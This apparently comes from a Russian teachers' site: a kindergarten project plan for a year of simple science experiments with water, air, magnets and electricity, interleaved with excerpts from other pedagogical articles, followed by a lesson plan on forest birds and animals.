Важнейшая особенность детского экспериментирования состоит в том, что в нем имеют место две противоречивые тенденции: преобразования раскрывают перед ребенком новые стороны и свойства объектов, а новые знания рождают новые вопросы. Наличие этих двух тенденций делает простейший эксперимент ведущим методом деятельностного познания ребенком явлений живой и неживой природы. В игровой форме дошкольник делает первые шаги по освоению экспериментального метода естественных наук, а главное, в нем развивается любознательность и вкус к познавательной деятельности.

1. У детей проявился ярко выраженный интерес к объектам и явлениям природы. Они начали различать живую природу (растения, грибы, животные, человек) и неживую природу (воздух, почва, вода). Ребята узнали особенности природы родного края.

2. Ребята стали бережно относиться к природе, стремиться к правильному поведению по отношению к миру природы.

3. Дети стали постепенно овладевать навыками экологически безопасного поведения в природе.

4. У них сформировалось стремление к исследованию объектов природы, они научились делать выводы, устанавливать причинно-следственные связи.

5. Дети стали уверенно отличать и называть характерные признаки разных времен года. Могут объяснить причины смены времен года.

6. Ребята узнали значение воды и воздуха в жизни всех живых объектов природы и ее свойства.

7. Ребята исследовали землю, песок и их свойства.

8. Ребята научились вести наблюдения за объектами неживой природы, объяснять связи и цепочки в природе, выполнять Законы общего дома природы:

Все живые организмы имеют равное право на жизнь.

В природе все взаимосвязано.

В природе ничто никуда не исчезает, а переходит из одного состояния в другое.

9. Многие дети научились проводить простейшие опыты, исследования объектов неживой природы, будут с пользой для себя заниматься поисковой деятельностью.

14. Ребята гуманно станут обращаться со всеми объектами природы и соблюдать правила безопасности в природе по отношению к себе.

15. К экологическому воспитанию будут привлечены родители. Экологическое просвещение родителей даст большой плюс в экологическом воспитании детей детского сада.

Я считаю, что в поисково-исследовательской деятельности дошкольник получает возможность напрямую удовлетворить присущую ему любознательность, упорядочить свои представления о мире. Поэтому стремлюсь учить не всему, а главному, не сумме фактов, а целостному их пониманию, не столько дать максимум информации, сколько научить ориентироваться в её потоке, вести целенаправленную работу по усилению развивающей функции обучения, организовывать учебный процесс по модели личностно - ориентированного взаимодействия, согласно которой ребёнок является не объектом обучения, а субъектом образования.

Активизация познавательной деятельности младших школьников на уроках чтения через применение технологии развития критического мышления

1. Учащиеся самостоятельно подбирают литературу для чтения и читают с интересом. 2. Учащиеся логически последовательно излагают свои мысли в устной и письменной форме. 3. Обогащение словарного запаса...

Влияние физических упражнений, игр, развлечений на физическое развитие детей

С целью оценки эффективности разработанной программы сюжетных занятий на основе ритмической гимнастики в нескольких детских садах был проведен сравнительный педагогический эксперимент Шарманова С.Б., Федоров А.И...

Выразительное чтение как один из наиболее активных методов изучения лирических произведений в средних классах

Работа над выразительным чтением помогает добиваться мне неплохих результатов. Мои ученики - постоянные участники и призёры конкурсов чтецов. Их успехи в выразительном чтении отмечают и поэты, встречи с которыми проходят у нас в школе...

Игровая деятельность как средство повышения речевой активности детей младшего дошкольного возраста

Одним из этапов проекта является проведение констатирующих и итоговых диагностических занятий, позволяющих выявить уровень речевого развития дошкольников экспериментальной группы...

Использование наглядности и информационных технологий на уроках истории как средство повышения учебной мотивации

Мое особое внимание наглядные методы обучения в сочетании с информационными технологиями привлекли в последние 2-3 года. Связано это в первую очередь с тем...

информационная ценность воспитательный аспект достижение дидактических целей. По итогам проверки проведения открытой лекции преподавателем кафедры (факультета) заведующий кафедрой, декан...

Оптимальное сочетание форм учебной деятельности на уроках музыки как условие развития творческой активности школьников

В результате использования вышеописанных подходов в изучении музыки удалось: - раскрыть всесторонние способности учащихся; - повысить заинтересованность ребят и увлеченность предметом не только на уроках...

Организация предметноразвивающей среды в разных возрастных группах ДОУ

Принимая во внимание изложенные выше принципы и методические рекомендации по построению развивающей среды, примерный региональный стандарт дошкольного образования...

Познание неживой природы путём экспериментирования

На основе анализа психолого-педагогической и экологической литературы, мы сделали вывод о том, что детское экспериментирование имеет огромный развивающий потенциал. Главное достоинство детского экспериментирования заключается в том...

Православная культура и её роль в развитии личности дошкольников

Детям 5-6 лет трудно усвоить содержание событий, имеющих многозначный смысл, где участвует множество людей, вступающих в различные отношения между собою...

Развитие креативного мышления младших школьников средством дидактических игр на уроках математики в системе развивающего обучения

Все эти исследования и работа по этому вопросу помогли мне вместе с детьми добиться следующих результатов: 1. У детей повысился познавательный интерес к предмету (математики); 2...

Ролевая игра на уроках английского языка в начальных классах

Групповая деятельность оказывает положительное воздействие на личность учащегося. В современной методике урок иностранного языка рассматривается как социальное явление, где классная аудитория - это определенная социальная среда...

Формирование здорового образа жизни у дошкольников посредством валеологии

В процессе ознакомления старших дошкольников с человеческим организмом решаются следующие задачи: 1. Формировать у детей адекватные представления об организме человека; 2. Помочь ребёнку создать целостное представление о своём теле; 3...

В течение последних двух лет в группе проводится исследование главной целью которой было формирование эстетического восприятия у детей средствами природы. Моя работа была направлена на достижение оптимального общего развития дошкольников...

Эстетическое отношение к миру и художественное развитие средствами разных видов изобразительного искусства

Для проведения практических исследований (экспериментов) былииспользованы дети старших групп ДОУ. Эксперимент № 1 (констатирующий). Цель. Определить особенности эстетического отношения старших дошкольников к природе и к своему рисунку...

Проект

«Экспериментирование с объектами живой и неживой природы».

Подготовила: старший воспитатель МКДОУ Бутурлиновский д/с общеразвивающего вида №1

Черных Т.А.

Эффективный метод познания закономерностей и явлений окружающего мира и как никогда экспериментирование является одной из актуальнейшей проблем современности.

Имеет огромный развивающий потенциал. Главное его достоинство в том, что оно даёт детям реальные представления о различных сторонах изучаемого объекта, о его взаимоотношениях с другими объектами и средой обитания.

обогащает память ребёнка, активизирует его мыслительные процессы, включает в себя активные поиски решения задач, т.е. ирование является хорошим средством интеллектуального развития дошкольников.

экспериментировании наиболее мощно проявляется собственная активность детей, направленная на получения новых знаний, сведений.

Для детей дошкольного возраста экспериментирование, наравне с игрой является ведущим видом деятельности.

Экспериментирование тесно связано со всеми видами деятельности, и в первую очередь с такими, как наблюдение и труд. Наблюдение является непременной составной частью любого эксперимента, так как с его помощью осуществляется восприятие хода работы и ее результатов.

Очень тесно связаны между собой экспериментирование и развитие речи. Это хорошо прослеживается на всех этапах эксперимента - при формулировании цели, во время обсуждения методики и хода опыта, при подведении итогов и словесном отчете об увиденном.

Связь детского экспериментирования с изобразительной деятельностью тоже двусторонняя. Чем сильнее развиты изобразительные способности ребенка, тем точнее будет зарегистрирован результат природоведческого эксперимента.

Не требует особого доказательства связь экспериментирования с формированием элементарных математических представлений. Во время проведения опытов постоянно возникает необходимость считать, измерять, сравнивать, определять форму и размеры, производить иные операции. Все это придает математическим представлениям реальную значимость и способствует их осознанию. В то же время владение математическими операциями облегчает экспериментирование.

Типология проекта: проект носит комплексный характер – включает в себя исследовательско -творческую, познавательную и практическую деятельность.

Сроки реализации: долгосрочный – 1 год.

Участники проекта: дети старшего дошкольного возраста (5-7 лет), родители воспитанников, педагоги.

Цель проекта: Развитие познавательных способностей детей дошкольного возраста через экспериментирование.

Задачи проекта:

Формировать у детей дошкольного возраста диалектическое мышление, т.е. способность видеть многообразие мира в системе взаимосвязей и взаимозависимостей;

Развивать собственный познавательный опыт в обобщенном виде с помощью наглядных средств (эталонов, символов условных заместителей, моделей);

Расширять перспективы развития поисково-познавательной деятельности детей путём включения их в мыслительные, моделирующие и преобразующие действия;

Поддерживать у детей инициативу, сообразительность, пытливость, критичность, самостоятельность.

Методы и технологии реализации проекта: метод проекта; личностно-ориентированные технологии; познавательные занятия и игры - экспериментирование, беседы с детьми, продуктивные виды деятельности.

Ресурсное обеспечение проекта.

Методическое:

1. “Неизведанное рядом. Опыты и эксперименты для дошкольников”, Дыбина О.В., Рахманова Н.П., Щетинина В.В, 2010 г.

2. “Экспериментальная деятельность детей среднего и старшего дошкольного возраста”, Чистякова А.Е., 2010 г.

3. “Организация опытно -экспериментальной деятельности детей 2-7 лет”, Мартынова Е.А., Сучкова И.М., 2011 г.

4. “Игры с водой и песком”, Рыжова Н.В., Обруч №2, 1997 г.

5. “Опыты с песком и глиной”, Рыжова Н.В., Обруч №2, 1998 г.

Материально-техническое:

Подборка консультативного материала для педагогов и родителей;

Разработка группового проекта, конспектов занятий и игр - экспериментирование;

Подбор иллюстраций, детской литературы;

Подготовка оборудования и материалов для экспериментирования, продуктивной деятельности детей;

Оформление “детской лаборатории в группе.

Этапы проведения проекта.

I. Подготовительный (мотивационный, информационно-накопительный).

1. Подготовка к работе педагогов.

Анализ методической литературы.

Подборка рассказов, картин, иллюстраций по теме “Опыты, экспериментирование для дошкольников”.

Разработка перспективного тематического плана работы с детьми.

Подготовка дидактического и практического материала для проведения опытов.

2. Сотрудничество с родителями.

Оформление информационно-просветительского материала в виде, папок-передвижек, выставление его на сайте детского сада по теме “Детское экспериментирование”.

Привлечение родителей к участию в мероприятиях в рамках проекта:

Подборка иллюстраций, картин; сбор информации.

Создание совместных с детьми альбомов по проведению опытов.

Подбор материалов и помощь в оформлении лаборатории.

3. Подготовительная работа с детьми.

Беседа и рассматривание иллюстраций, чтение художественной литературы: кто такие ученые; что такое лаборатория, ее назначение.

Экскурсия в “детскую лабораторию”. Формирование у детей представлений для чего нужны опыты и эксперименты.

Проведение опытов с объектами живой и неживой природы: водой, песком, воздухом, камнями.

Примерный алгоритм группового проекта

Мотивация выбора темы. Модель трех вопросов.

1. Что мы знаем?

Развивающие вопросы, которые можно задать детям:

Для чего нам нужна лаборатория в группе?

Для чего нужны эксперименты?

Вспомнить какие опыты проводили, что в результате их узнали, что запомнилось интересное?

2. Что мы хотим узнать?

Что такое микроскоп и лупа?

Какие вещества растворяет вода?

Почему дует ветер?

Почему не тонут айсберги?

Как действует магнит на предметы?

3. Что нужно сделать, чтобы узнать?

Приобрести оборудование в лабораторию для опытов.

Проделать эксперименты и опыты.

Задать свои вопросы родителям, воспитателям, вместе с ними почитать книги, посмотреть информацию в энциклопедиях.

Рассказать друг другу о том, что узнали.

II. Практический.

Формы организации образовательного процесса

В разных видах детской деятельности в системе “Педагог - Ребенок – Родители”

Работа с детьми

Экскурсия в “детскую лабораторию”.

Цель: уточнить представление о том, кто такие учёные, о назначении детской лаборатории и культуре поведения в ней.

Октябрь

Эксперимент “Какая бывает вода”.

Цель: уточнить представление детей о свойствах воды: прозрачная, без запаха, имеет вес, не имеет собственной формы; познакомить с принципом работы пипетки, развить умение действовать по алгоритму, разгадывать элементарный кроссворд.

Эксперимент “Вода – растворитель. Очищение воды”.

Цель: выявить вещества, которые растворяются в воде; познакомить со способом очистки воды – фильтрованием; закрепить знания о правилах поведения при работе с различными веществами.

Эксперимент “Куда делась вода”.

Цель: выявить процесс испарения воды, зависимость скорости испарения от условий (температура воздуха, открытая и закрытая поверхность воды).

Эксперимент – развлечение “Путешествие Капельки”.

Цель: познакомить детей с круговоротом воды в природе, обозначить причину выпадения осадков в виде дождя и снега; расширить представление детей о значении воды для жизни человека; развивать социальные навыки у детей; умение работать в группе, договариваться, учитывать умение партнёра доказывать правильность своего мнения.

Ноябрь

Эксперимент “Путешествие в мир стеклянных вещей”.

Цель: познакомить со стеклянной посудой, активизировать познавательную деятельность; вызвать интерес к предметам рукотворного мира, закрепить умение классифицировать материал, из которого делают предметы.

Эксперимент “Волшебные стёклышки”.

Цель: познакомить детей с приборами для наблюдения – микроскопом, лупой, биноклем; объяснить, для чего они нужны человеку.

Эксперимент “Меня зовут Стеклянчик”.

Цель: познакомить с производством фарфора; научить сравнивать свойства стекла и фарфора; активизировать познавательную деятельность.

Эксперимент “Родственники стекла”.

Цель: узнавать предметы, изготовленные из стекла, фарфора, фаянса. Сравнить их качественные характеристики и свойства.

Декабрь

Эксперимент “Воздух”.

Цель: расширить представление детей о свойствах воздуха: невидим, не имеет запаха, имеет вес, при нагревании расширяется, при охлаждении сжимается; закрепить умение самостоятельно пользоваться чашечными весами; познакомить детей с историей изобретения воздушного шара.

Эксперимент “Почему дует ветер”.

Цель: познакомить детей с причиной возникновения ветра – движением воздушных масс; уточнить представления детей о свойствах воздуха: горячий поднимается вверх – он лёгкий, холодный опускается вниз – он тяжёлый.

Эксперимент “Этот удивительный воздух”.

Цель: дать представление об источниках загрязнения воздуха; формировать желание заботиться о чистоте воздуха.

Эксперимент “Вдох - выдох”.

Цель: расширить представление о воздухе, способах его обнаружения, об объёме воздуха в зависимости от температуры, о времени, в течение которого человек может находиться без воздуха.

Январь

Эксперимент “Разноцветные сосульки”.

Цель: реализовать свои представления о свойствах воды (прозрачность, растворимость, замерзание при низкой температуре), полученные в ходе поисковой деятельности.

Эксперимент “Твёрдая вода. Почему не тонут айсберги”.

Цель: уточнить представление детей о свойствах льда: прозрачный, твёрдый, имеет форму, при нагревании тает и превращается в воду; дать представление об айсбергах, их опасности для судоходства.

Эксперимент “Изменение объёма жидкости”.

Цель: выявить изменение объёма жидкости при замерзании.

Февраль

Эксперимент “Испытание магнита”.

Цель: познакомить детей с физическим явлением – магнетизмом, магнитом и его особенностями; опытным путём выявить материалы, которые могут стать магнетическими.

Эксперимент “Два магнита”.

Цель: выявить особенность взаимодействия двух магнитов: притяжение и отталкивание.

Эксперимент “Как действуют магниты на предметы”.

Цель: расширить логический и естественнонаучный опыт детей, связанный с выявлением таких свойств материалов, как липкость, способность приклеивать и приклеиваться, свойств магнитов притягивать железо.

Эксперимент “Необычная скрепка”.

Цель: определить способность металлических предметов намагничиваться.

Март

Эксперимент “Волшебный шарик”.

Цель: установить причину возникновения статистического электричества.

Эксперимент “Чудо-причёска”.

Цель: познакомить с проявлением статистического электричества и возможностью снятия его с предметов. Выявить взаимодействие двух наэлектризованных предметов

Эксперимент “Что такое молния”.

Цель: познакомить детей с понятиями “ электричество”, “электрический ток”; сформировать основы безопасного обращения с электричеством; объяснить причину образования молнии.

Эксперимент “Почему горит фонарик”.

Цель: уточнить представление детей о значении электричества для людей; познакомить с батарейкой – хранителем электричества – и способом использования лимона в качестве батарейки.

Апрель

Эксперимент “Сила тяготения”.

Цель: дать детям представление о существовании невидимой силы – силы тяготения, которая притягивает предметы и любые тела к земле.

Эксперимент “Две пробки”.

Цель: выяснить, как действуют сила притяжения.

Эксперимент “Упрямые предметы”.

Цель: познакомить детей с физическим свойством предметов – инерцией; развивать умение фиксировать результат наблюдения.

Эксперимент “Почему предметы движутся”.

Цель: познакомить с физическими понятиями: “сила”, “трение”; показать пользу трения; закрепить умение работать с микроскопом.

Май

Оформление электронной презентации, оформление выставки детских альбомов по экспериментированию; представление результатов работы с детьми для родителей и педагогов.

Работа с родителями

Октябрь

Предложить родителям приобрести для опытов: соломинки, пипетки, марлю, сосуды разной формы, клеёнку, сетку для опытов и экспериментов. Сшить халаты “ученых” для экспериментирования, сделать эмблемы.

Ноябрь

Помощь родителей в подборе наглядной информации о стекле и его свойствах.

Декабрь

Дать задание родителям сделать или приобрести детский флюгер для занятий по экспериментированию.

Январь

Предложить родителям провести эксперимент с цветными льдинками дома вместе с детьми.

Февраль

Предложить родителям провести дома вместе с детьми опыты с магнитами.

Март

Дать домашнее задание родителям побеседовать с детьми на тему “электричество”, “молния”, и изобразить молнию на листке.

Апрель

Помощь родителей в проведение опытов принести по две пробки.

Май

Домашнее задание родителям вместе с детьми определить “Где живёт эхо?”.

III. Обобщающий.

Оценка реализации проекта детьми: беседа “Что мы хотели узнать, что мы узнали и сделали, для чего?”.

Презентация продуктов деятельности.

Ожидаемые результаты.

Для детей.

У детей сформируется представление о взаимосвязи природы и человека.

Дети овладеют способами практического взаимодействия с окружающей средой.

Сформируются личностные компетентности соответственно возрасту детей: познавательная активность и интерес, самостоятельность, креативность, инициатива.

Для педагогов.

Обобщение педагогического опыта, внедрение инновационных технологий и новых форм работы по детскому экспериментированию.

Повышение теоретического и профессионального уровня педагогов через овладение метода проекта в работе с детьм и.

Конспект занятия по познавательному развитию, исследование объектов живой и неживой природы, экспериментирование,

по теме «Лесные радости» в подготовительной группе.

Цели: закрепить знания детей о птицах, их отличительных особенностях;

Закреплять знания детей о диких животных, особенностях внешнего вида, повадках, среде обитания;

Учить детей давать полные ответы на вопросы, воспитывать умения связано и последовательно пересказывать текст;

Развивать умения средствами речи выражать свои мысли и впечатления;

Развивать у детей понимание того, что лес это единый целостный организм и нарушать его нельзя.

Воспитывать заботливое и ответственное отношение к лесу и его жителям.

Материалы: ландшафтный рисунок «Лес», изображения птиц (соловей, кукушка, скворец, трясогузка), изображения животных (заяц, зайчата, еж, ежата, лиса, лисята, белка, бельчата), макет дерева, объявления от зверей, дидактические игры «Было, есть будет», «Какая птичка улетела из домика?», «Кого не стало?», «Цепь питания», «Накорми животных».

Ход занятия:

Воспитатель: Ребята, мы с вами уже узнали много интересного о лесе. Что растет в лесу, кто живет в лесу, как себя надо вести в лесу и почему.

А происходят ли в лесу радостные события? Какие они? Как вы думаете?

Дети: Радостно птичкам, когда у них рождаются птенчики. Весь лес радуется, когда наступает весна, когда солнечные дни, птицы звонко поют, значит, радуются, а звери радуются, когда хорошая охота.

Воспитатель: Да, правильно, а еще большая радость для птиц – вернуться к себе на родину. Кто знает, какие птицы возвращаются в наш лес весной?


В темной зелени ветвей

Трель выводит соловей.

Льются песни без конца.

Лучше нет в лесу певца!

Ребята, давайте опишем с вами, как выглядит соловей.(Сверху он окрашен в темно-каштановый цвет, с более темным оттенком на спине, снизу оперение светло-серое, грудка и горлышко белые, а хвост красновато-бурый. Ни одного яркого пят­нышка нет в его оперении). Найдите его на картинке. Когда соловей прилетает в лес? (В мае). Какие звуки издает соловей? Щебечет, свистит, цокает. Есть пословица: «У соловья скромное оперение, да волшебное пение». Чем питается? (Муравьями, мухами. Жуками, гусеницами, пауками, семенами разных растений, ягод Когда улетает на юг? (В сентябре).

ТРИЗ-игра «Было, есть, будет»

Детям необходимо сложить пазл-рисунок, отображающий процесс развития птицы от яйца до взрослой птицы.

На лесной опушке

Слышится «ку-ку».

Так поет кукушка

Где-то наверху.

Воспитатель: Ребята, а кто что знает про кукушку? Как выглядит кукушка? (Она похожа и по размерам, и по окраске на ястреба и летает так же, как он, с буровато-серым оперением). Вьет ли кукушка гнездо? Чем питается? (Мохнатыми гусеницами). Когда улетает на юг? (Сентябрь)

ТРИЗ – игра «Разговор с кукушкой» (прокуковать правильный ответ необходимое количество раз).

Сколько глаз у птиц?

Сколько ног?

Сколько крыльев?

Сколько хвостов?

Сколько клювов?

Сколько перьев?

Прилетели скворцы –

Молодой весны гонцы.

Червяков они клюют

И поют, поют, поют.

Как выглядит скворец?(Скворец — крупная, красивая птица с блестя­щим черным оперением. У него прямой длинный клюв, черный у самочки и ярко-желтый — у сам­ца. Клюв помогает скворцу добывать из земли чер­вяков.) Где скворцы строят гнезда? (В лесу, вдуплах). Как скворцы выманивают малышей из гнезда? (Скворчиха приносит в клюве аппетитного червя­ка, садится на жердочку около окошка и показы­вает лакомство скворчонку. Птенец тянет клювик за угощением, а мама отодвигается от него подаль­ше. Скворчонок, цепляясь лапками за оконце, высовывается, перевешивается и летит вниз. Он испуганно кричит, но в этот момент крылышки раскрываются, поддерживают птенца, и он при­земляется на лапки. Мать, чтобы подбодрить скворчонка, угощает его червяком.) Чем питается скворец? (Червяками, улитками, слизняками и насекомыми). Где зимуют? (В Африке).


Дидактическая игра «Какая птичка улетела из домика?»

Ребятам предлагаются домики с окошками, которые населяют птички. Но некоторые окна пустуют. Ребятам нужно догадаться, какие птички улетели из домика.

Трясогузка, трясогузка,

Полосатенькая блузка!

Я тебя всю зиму жду,

Поселись с моем лесу.

Как выглядит трясогузка? (Трясогузка стройная и грациозная. Спинка и бока у нее серые, брюшко белое, верхняя часть грудки, хвост и крылья черные, блестящие, ук­рашенные по краям белыми перышками.) Чем питается? (мошкарой, бабочками, жуками, комарами). Когда прилетает в наши края? (Ранней весной). Где вьют гнезда? Почему? (Около ручейков, водоемов, здесь им легче раздобыть корм себе и птенцам). Когда улетают в теплые края? (В конце лета).

Дидактическая игра «Кого не стало?»

Выставляются картинки изученных птиц. Ребята их рассматривают, а потом закрывают глаза. В это время воспитатель убирает одну из картинок. Затем дети открывают глаза и определяют, какой картинки не хватает.

Физминутка «Я кукую - ты выполняй».

Выполнять движения из текста столько раз, сколько воспитатель прокукует.

Мы похлопаем в ладоши.

Постучали наши ножки.

Ку-ку, ку-ку!

По коленочкам ударим.

Ручки выше поднимаем.

Влево-вправо наклонились.

Ку-ку, ку-ку!

Приседайте, не ленитесь!

Воспитатель: К нам прилетают и другие птицы, кого вы знаете? (Журавли, лебеди, утки). Ребята, а вам радостно от того, что лес наполняется звуками пения птиц? Послушайте их, когда пойдете с родителями в лес. Постарайтесь узнать голоса птиц, и на душе станет радостно, тепло. Как вы думаете, а какие еще радостные события происходят в лесу? (Ответы детей).

У зайцев рождаются зайчата. Кто кормит маленьких зайчат?(Другая мама-зайчиха, молоком. Потом, оставшись одни и осмелев, питаются травой). Почему мама не сидит со своими детьми? (Идет подкрепиться свежей молодой травкой.) Как называются зайчата, родившиеся ранней весной? (Настовиками, т. к. родились зайчата тогда, когда землю покрывал снежный наст). А в конце лета? (Листопадничками, т. к. в это время начинают облетать листья – наступает пора «листопада»).

Дидактическая игра «Исправь предложение»

Заяц охотится за лисой. Зайцы питаются мясом крупных животных. Зайцы очень смелые животные. У зайчихи родились оленята.

Воспитатель: Ежи пробуждаются ото сна. Как выглядит ежик? Что помогает ему скрываться от врагов? Делает ли еж запасы на зиму? (Нет). Назовите любимые лакомства ежа? (Ядовитые змеи, лягушки, мышами, ящерицы, жуки, черви).

ТРИЗ –игра «Цепь питания»

Из имеющихся картинок детям необходимо выстроить всевозможные цепи питания.

Скачет белка там и тут.

Белкин хвост как парашют!

Управляет им умело,

Белка вниз с сосны слетела.

Как выглядит белка? Чем питается? (Орехами, семенами хвойных деревьев, грибами, соцветиями цветков). Делает ли запасы на зиму? (Да).

Дидактическая игра «Накорми животных»

Ребятам нужно расставить еду-картинки по тени в нужную ячейку.

Не любит семечки из шишек,

А ловит бедных серых мышек.

Среди зверей она краса!

Плутовка – рыжая лиса!

Как выглядит лиса? Как называют лис? (Лиса – всему свету краса») Почему? Где она живет? (В лесных чащобах, в глубокой норе, на песчаном, заросшем густыми кустами склоне ручья или реки). Кто воспитывает маленьких лисят? (Оба родителя). Как лисы учат своих малышей ловить еду? (Лисята подражают маме, мама показывает как надо ловить кузнечиков; как на пружинках, подскакивает вслед за кузнечиком и щелкнув зубами, на лету ловит его).


ТРИЗ-игра «Волшебные превращения»

(на основе эмпатии и прямой аналогии по рассказу воспитателя).

Ребенок должен, отождествляя себя с животным, названной воспитателем, передать движением, жестами, позой ее отличительные особенности.

Белка - перепрыгивает с «ветки на ветку», грызет орех;

Заяц – дрожит, бежит быстро;

Медведь – переваливается, ревет, сосет лапу;

Лиса - ходить на цыпочках, крадется, виляет хвостиком;

Еж – фырчит, семенит ножками, вынюхивает что-то.

Дети: А еще птицы, звери и растения радуются, когда в лесу нет пожара и засухи.

Воспитатель: Когда полянка вся в цветах, она, наверное, тоже очень радуется. А мы с вами можем помочь лесу побольше радоваться? Как вы думаете, как? (Соблюдать правила леса и учить им взрослых).

Дети: Не надо мешать лесу жить своей жизнью.

Воспитатель: Да, ребята, вмешавшись в жизнь леса, мы можем помешать птицам, животным и растениям. Влесу надо быть очень осторожными, внимательными. А чтобы не делать ошибок, надо знать о лесе, как можно больше.

Посмотрите на наше дерево. На нем необычные листья, что вы на них видите? (Объявления). Давайте прочитаем их и узнаем, какие обитатели леса поделились своей радостью снами.

    Добрым и одиноким птицам помогу обрести семейное счастье! Воспитайте моих птенцов, материнских чувств у меня не было и не будет. Ку-ку! Прошу разбудить меня весной. Приходить с медом. Всем! Всем! Всем! У кого возникла надобность врогах, раз в год обращаться ко мне. Приходите ко мне в гости, адреса не имею, свой дом ношус собой. Друзья! Кому нужны иголки, обращайтесь ко мне! Учу всем наукам! Из птенцов в короткое время сделаю настоящих птиц. Занятия проходят в ночное время. Я самая обаятельная и привлекательная! Кого хочешь вокруг пальца обведу, обману. Патрикеевной прошу не называть.

Воспитатель: О чем сегодня мы с вами говорили? Каких птиц вспомнили? Особенности внешнего вида, повадках каких животных мы говорили? О чем необходимо помнить, находясь в лесу? Что больше всего понравилось на занятии?

Молодцы, вы хорошо сегодня поработали и доставили радость не только лесным жителям, но и мне.

Литература:

«Добро пожаловать в экологию! Детские экологические проекты», 2014г. «Дошкольникам о природных сообществах»,

«Синичкин сарафан», 2002г. «Птицы. Какие они?», «Какие звери в лесу?», 2008г.